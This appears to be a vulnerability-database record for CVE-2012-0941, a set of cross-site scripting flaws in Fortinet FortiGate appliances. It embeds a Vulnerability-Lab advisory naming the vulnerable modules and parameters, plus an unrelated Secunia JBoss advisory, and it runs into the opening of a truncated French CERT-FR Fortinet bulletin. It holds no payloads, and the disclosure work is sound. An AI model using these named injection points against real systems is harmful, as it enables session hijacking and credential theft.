"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201802-0013",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fortios",
"scope": "lt",
"trust": 1.0,
"vendor": "fortinet",
"version": "4.3.6"
},
{
"model": "fortios",
"scope": "gte",
"trust": 1.0,
"vendor": "fortinet",
"version": "4.3.0"
},
{
"model": "fortios",
"scope": "lt",
"trust": 0.8,
"vendor": "fortinet",
"version": "4.3.x"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.8,
"vendor": "fortinet",
"version": "4.3.6"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.6,
"vendor": "fortinet",
"version": "4.3.0"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "800"
},
{
"model": "fortigate 620b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5000"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3950"
},
{
"model": "fortigate 3810a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 3600a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 311b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 310b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 3016b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 300a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 224b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 200b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 1240b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
}
],
"sources": [
{
"db": "BID",
"id": "51708"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-006401"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-142"
},
{
"db": "NVD",
"id": "CVE-2012-0941"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:fortinet:fortios",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-006401"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Benjamin Kunz Mejri (Rem0ve)",
"sources": [
{
"db": "BID",
"id": "51708"
},
{
"db": "CNNVD",
"id": "CNNVD-201201-446"
}
],
"trust": 0.9
},
"cve": "CVE-2012-0941",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2012-0941",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-54222",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2012-0941",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2012-0941",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2012-0941",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201202-142",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-54222",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54222"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-006401"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-142"
},
{
"db": "NVD",
"id": "CVE-2012-0941"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in Fortinet FortiGate UTM WAF appliances with FortiOS 4.3.x before 4.3.6 allow remote attackers to inject arbitrary web script or HTML via vectors involving the (1) Endpoint Monitor, (2) Dialup List, or (3) Log\u0026Report Display modules, or the fields_sorted_opt parameter to (4) user/auth/list or (5) endpointcompliance/app_detect/predefined_sig_list. Fortinet FortiOS Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Fortinet FortiGate UTM WAF appliances is a firewall device from Fortinet. FortiOS is an operating system that runs on it. Remote attackers can exploit this vulnerability to inject arbitrary Web scripts or HTML. Title:\n======\nFortigate UTM WAF Appliance - Multiple Web Vulnerabilities\n\n\nDate:\n=====\n2012-01-27\n\n\nReferences:\n===========\nhttp://vulnerability-lab.com/get_content.php?id=144\n\n\nVL-ID:\n=====\n144\n\n\nIntroduction:\n=============\nThe FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email \nand Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading \nnetwork performance. \n\nRanging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and \ncarriers, the FortiGate line combines the FortiOS\u2122 security operating system with FortiASIC processors and other hardware to provide \na comprehensive and high-performance array of security and networking functions including:\n\n * Firewall, VPN, and Traffic Shaping\n * Intrusion Prevention System (IPS)\n * Antivirus/Antispyware/Antimalware\n * Web Filtering\n * Antispam\n * Application Control (e.g., IM and P2P)\n * VoIP Support (H.323. and SCCP)\n * Layer 2/3 routing\n * Multiple WAN interface options\n\nFortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including \ncomplex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated \nnetworking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) \ncapabilities to separate various networks requiring different security policies. \n\n(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate/ \u0026\u0026 http://www.avfirewalls.com/)\n\n\nAbstract:\n=========\n1.1\nVulnerability-Lab Team discovered multiple persistent Web Vulnerabilities on the FortiGate UTM Appliance Application. \n\n1.2\nVulnerability-Lab Team discovered multiple non-persistent Web Vulnerabilities on the FortiGate UTM Appliance Application. \n\n\nReport-Timeline:\n================\n2012-01-27:\tPublic or Non-Public Disclosure\n\n\nStatus:\n========\nPublished\n\n\nAffected Products:\n==================\n\nExploitation-Technique:\n=======================\nRemote\n\n\nSeverity:\n=========\nHigh\n\n\nDetails:\n========\n1.1\nMultiple input validation vulnerabilities(persistent) are detected on FortGate UTM Appliance Series. Remote attacker can include (persistent) \nmalicious script code to manipulate specific customer/admin requests. The vulnerability allows an local low privileged attacker to manipulate \nthe appliance(application) via persistent script code inject. \n\nIt is also possible to hijack customer sessions via persistent script code execution on application side. Successful exploitation can also \nresult in content/module request manipulation, execution of persistent malicious script code, session hijacking, account steal \u0026 phishing. \n\n\nVulnerable Module(s): (Persistent)\n\t\t\t\t\t\t[+] Endpoint =\u003e Monitor =\u003e Endpoint Monitor\n\t\t\t\t\t\t[+] Dailup List\n\t\t\t\t\t\t[+] Log\u0026Report =\u003e Display\n\nPicture(s):\n\t\t\t\t\t\t../ive2.png\n\t\t\t\t\t\t../ive3.png\n\n\n1.2\nMultiple input validation vulnerabilities(non-persistent) are detected on FortGate UTM Appliance Series. The vulnerability allows remote \nattackers to hijack admin/customer sessions with required user inter action (client-side). Successful exploitation allows to phish user accounts,\nredirect over client side requests or manipulate website context on client-side browser requests. \n\nVulnerable Module(s): (Non-Persistent)\n\t\t\t\t\t\t[+] Endpoint -\u003e NAC -\u003e Application Database -\u003e Listings\n\t\t\t\t\t\t[+] List field sorted\n\n\t\t\n\t\t\t\nPicture(s):\n\t\t\t\t\t\t../ive1.png\n\n\nProof of Concept:\n=================\nThe vulnerabilities can be exploited by remote attackers with or without user inter action. For demonstration or reproduce ... \n\npoc: =\u003e http://www.vulnerability-lab.com/get_content.php?id=144\n\n\nSolution:\n=========\n1.1\nTo fix/patch the persistent input validation vulnerabilities restrict the input fields \u0026 parse the input. \nLocate the vulnerable area(s) reproduce the bugs \u0026 parse the output after a malicious(test) insert. \nSetup a filter or restriction mask to prevent against future persistent input validation attacks. \n\n\n1.2\nTo fix the client side input validation vulnerability parse the vulnerable request by filtering the input \u0026 cleanup the output. \nSet a input restriction or configure whitelist/filter to stop client side requests and form a secure exception-handling around. \n\n\nRisk:\n=====\n1.1\nThe security risk of the persistent vulnerabilities are estimated as high because of multiple persistent input validation vulnerabilities on different modules. \n\n1.2\nThe security risk of the non-persistent cross site requests are estimated as low because of required user inter-action to hijack a not expired session. \n\n\nCredits:\n========\nVulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)\n\n\nDisclaimer:\n===========\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, \neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \nmay not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-\nLab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of \nother media, are reserved by Vulnerability-Lab or its suppliers. \n\n \t\t\t\t\t\tCopyright \u00a9 2012|Vulnerability-Lab\n\n\n\n\n-- \nWebsite: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com\nContact: admin@vulnerability-lab.com or support@vulnerability-lab.com\n\n. ----------------------------------------------------------------------\n\nSC Magazine awards the Secunia CSI a 5-Star rating\nTop-level rating for ease of use, performance, documentation, support, and value for money. Read more and get a free trial here: http://secunia.com/blog/296 \n\n----------------------------------------------------------------------\n\nTITLE:\nJBoss Multiple Products JMX Console Authentication Bypass\n\nSECUNIA ADVISORY ID:\nSA47850\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/47850/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47850\n\nRELEASE DATE:\n2012-02-06\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/47850/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/47850/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47850\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA security issue has been reported in multiple JBoss products, which\ncan be exploited by malicious people to bypass certain security\nrestrictions. \n\nThe security issue is caused due to improper access restrictions to\nthe JMX Console. \n\nFor more information see vulnerability #1 in:\nSA39563\n\nThe security issue is reported in the following products:\n* JBoss Communications Platform 1.2\n* JBoss Enterprise Application Platform 5.0 and 5.0.1\n* JBoss Enterprise Portal Platform 4.3\n* JBoss Enterprise Web Platform 5.0\n* JBoss SOA-Platform 4.2, 4.3, and 5.0\n\nSOLUTION:\nUpdate to a fixed version. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nORIGINAL ADVISORY:\nJBPAPP-3952:\nhttps://issues.jboss.org/browse/JBPAPP-3952\n\nJBPAPP-4713:\nhttps://issues.jboss.org/browse/JBPAPP-4713\n\nRed Hat Doc#30741:\nhttps://access.redhat.com/kb/docs/DOC-30741\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-0941"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-006401"
},
{
"db": "BID",
"id": "51708"
},
{
"db": "VULHUB",
"id": "VHN-54222"
},
{
"db": "PACKETSTORM",
"id": "109168"
},
{
"db": "PACKETSTORM",
"id": "109458"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "51708",
"trust": 2.6
},
{
"db": "NVD",
"id": "CVE-2012-0941",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "109168",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1026594",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2012-006401",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201202-142",
"trust": 0.7
},
{
"db": "SECUNIA",
"id": "47850",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201201-446",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-54222",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109458",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54222"
},
{
"db": "BID",
"id": "51708"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-006401"
},
{
"db": "PACKETSTORM",
"id": "109168"
},
{
"db": "PACKETSTORM",
"id": "109458"
},
{
"db": "CNNVD",
"id": "CNNVD-201201-446"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-142"
},
{
"db": "NVD",
"id": "CVE-2012-0941"
}
]
},
"id": "VAR-201802-0013",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-54222"
}
],
"trust": 0.01
},
"last_update_date": "2024-08-14T14:51:44.502000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FG-IR-012-001",
"trust": 0.8,
"url": "https://fortiguard.com/psirt/FG-IR-012-001"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-006401"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54222"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-006401"
},
{
"db": "NVD",
"id": "CVE-2012-0941"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/51708"
},
{
"trust": 1.8,
"url": "https://www.vulnerability-lab.com/get_content.php?id=144"
},
{
"trust": 1.7,
"url": "https://fortiguard.com/psirt/fg-ir-012-001"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.org/files/109168/vl-144.txt"
},
{
"trust": 1.7,
"url": "https://securitytracker.com/id/1026594"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/72761"
},
{
"trust": 0.9,
"url": "http://www.fortiguard.com/advisory/fga-2012-02.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0941"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0941"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/47850"
},
{
"trust": 0.4,
"url": "http://vulnerability-lab.com/get_content.php?id=144"
},
{
"trust": 0.3,
"url": "http://www.fortinet.com/products/fortigate_overview.html"
},
{
"trust": 0.1,
"url": "http://www.avfirewalls.com/)"
},
{
"trust": 0.1,
"url": "http://www.fortinet.com/products/fortigate/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/kb/docs/doc-30741"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/browse/jbpapp-3952"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/47850/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/47850/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47850"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/browse/jbpapp-4713"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/296"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54222"
},
{
"db": "BID",
"id": "51708"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-006401"
},
{
"db": "PACKETSTORM",
"id": "109168"
},
{
"db": "PACKETSTORM",
"id": "109458"
},
{
"db": "CNNVD",
"id": "CNNVD-201201-446"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-142"
},
{
"db": "NVD",
"id": "CVE-2012-0941"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-54222"
},
{
"db": "BID",
"id": "51708"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-006401"
},
{
"db": "PACKETSTORM",
"id": "109168"
},
{
"db": "PACKETSTORM",
"id": "109458"
},
{
"db": "CNNVD",
"id": "CNNVD-201201-446"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-142"
},
{
"db": "NVD",
"id": "CVE-2012-0941"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-02-08T00:00:00",
"db": "VULHUB",
"id": "VHN-54222"
},
{
"date": "2012-01-27T00:00:00",
"db": "BID",
"id": "51708"
},
{
"date": "2018-03-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-006401"
},
{
"date": "2012-01-27T23:38:44",
"db": "PACKETSTORM",
"id": "109168"
},
{
"date": "2012-02-06T04:01:35",
"db": "PACKETSTORM",
"id": "109458"
},
{
"date": "1900-01-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201201-446"
},
{
"date": "2012-02-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201202-142"
},
{
"date": "2018-02-08T23:29:00.313000",
"db": "NVD",
"id": "CVE-2012-0941"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-02-27T00:00:00",
"db": "VULHUB",
"id": "VHN-54222"
},
{
"date": "2012-03-26T07:40:00",
"db": "BID",
"id": "51708"
},
{
"date": "2018-03-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-006401"
},
{
"date": "2012-02-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201201-446"
},
{
"date": "2018-02-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201202-142"
},
{
"date": "2018-02-27T19:44:58.543000",
"db": "NVD",
"id": "CVE-2012-0941"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201201-446"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-142"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Fortinet FortiOS Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-006401"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "109168"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-142"
}
],
"trust": 0.7
}
}
CERTFR-2023-AVI-0973
Vulnerability from certfr_avis - Published: 2023-11-22 - Updated: 2023-11-22
De multiples vulnérabilités ont été découvertes dans les produits Fortinet. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Fortinet | FortiGate | Fortigate FGT_VM64 versions 7.4.x antérieures à 7.4.2 | ||
| Fortinet | N/A | FortiClientWindows versions 7.2.x antérieures à 7.2.2 | ||
| Fortinet | N/A | FortiClientWindows versions 7.0.x antérieures à 7.0.10 | ||
| Fortinet | FortiOS | FortiOS versions antérieures à 7.0.13 | ||
| Fortinet | FortiProxy | FortiProxy versions 2.0.x | ||
| Fortinet | FortiSIEM | FortiSIEM versions 6.7.x antériéures à 6.7.6 | ||
| Fortinet | FortiMail | FortiMail versions 7.4.x antérieures à 7.4.1 | ||
| Fortinet | N/A | FortiClientWindows versions 6.x antérieures à 6.4.9 | ||
| Fortinet | FortiSIEM | FortiSIEM versions 6.5.x antérieures à 6.5.2 | ||
| Fortinet | FortiMail | FortiMail versions antérieures à 7.0.7 | ||
| Fortinet | N/A | FortiWLM version 8.x antérieures à 8.5.5 | ||
| Fortinet | FortiDDoS | FortiDDOS-F versions 6.5.x antérieures à 6.5.1 | ||
| Fortinet | N/A | FortiEDRCollectorWindows versions 5.0.x antérieures à 5.0.3.1016 | ||
| Fortinet | FortiGate | Fortigate FGT_VM64 versions 7.x antérieures 7.2.7 | ||
| Fortinet | FortiAnalyzer | FortiAnalyzer versions 7.4.x antérieures à 7.4.1 | ||
| Fortinet | FortiSIEM | FortiSIEM versions antérieures à 6.4.3 | ||
| Fortinet | FortiManager | FortiManager versions antérieures à 7.2.4 | ||
| Fortinet | FortiSIEM | FortiSIEM versions 7.0.x antérieures à 7.0.1 | ||
| Fortinet | FortiOS | FortiOS versions 7.2.x antérieures à 7.2.6 | ||
| Fortinet | N/A | FortiEDRCollectorWindows versions 5.2.x antérieures à 5.2.0.4581 | ||
| Fortinet | FortiOS | FortiOS versions 7.4.x antérieures à 7.4.1 | ||
| Fortinet | FortiADC | FortiADC versions antérieures à 7.1.3 | ||
| Fortinet | FortiDDoS | FortiDDOS-F versions antérieures à 6.4.2 | ||
| Fortinet | FortiManager | FortiManager versions 7.4.x antérieures à 7.4.1 | ||
| Fortinet | FortiMail | FortiMail versions 7.2.x antérieures à 7.2.5 | ||
| Fortinet | FortiWAN | FortiWAN toutes versions (ce produit n'est plus maintenu par l'éditeur) | ||
| Fortinet | FortiProxy | FortiProxy versions 7.2.x | ||
| Fortinet | FortiSIEM | FortiSIEM versions 6.6.x antériéures à 6.6.4 | ||
| Fortinet | N/A | FortiWLM version 8.6.x antérieures à 8.6.6 | ||
| Fortinet | FortiAnalyzer | FortiAnalyzer versions antérieures à 7.2.4 | ||
| Fortinet | FortiProxy | FortiProxy versions 7.0.x |
References
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Fortigate FGT_VM64 versions 7.4.x ant\u00e9rieures \u00e0 7.4.2",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
